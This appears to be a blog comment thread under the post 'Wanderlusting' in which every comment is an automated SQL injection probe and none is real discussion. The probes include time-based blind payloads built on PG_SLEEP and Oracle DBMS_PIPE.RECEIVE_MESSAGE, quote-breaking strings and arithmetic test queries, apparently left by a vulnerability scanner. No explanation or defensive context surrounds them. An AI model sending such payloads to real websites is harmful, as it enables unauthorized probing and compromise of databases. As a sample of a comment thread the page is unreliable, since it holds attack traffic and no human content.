re: Wanderlusting
-1)) OR 264=(SELECT 264 FROM PG_SLEEP(15))--
re: Wanderlusting
SIIMMSfY' OR 681=(SELECT 681 FROM PG_SLEEP(15))--
re: Wanderlusting
jc5ifZdw') OR 304=(SELECT 304 FROM PG_SLEEP(15))--
re: Wanderlusting
PGxFBb4H')) OR 501=(SELECT 501 FROM PG_SLEEP(15))--
re: Wanderlusting
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Wanderlusting
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Wanderlusting
'||(select 1 from (select pg_sleep(15))x)||'
re: Wanderlusting
''||(select 1 from (select pg_sleep(15))x)||''
re: Wanderlusting
'"
re: Wanderlusting
@@uMy6K
re: Wanderlusting
(select 198766*667891)
re: Wanderlusting
(select 198766*667891 from DUAL)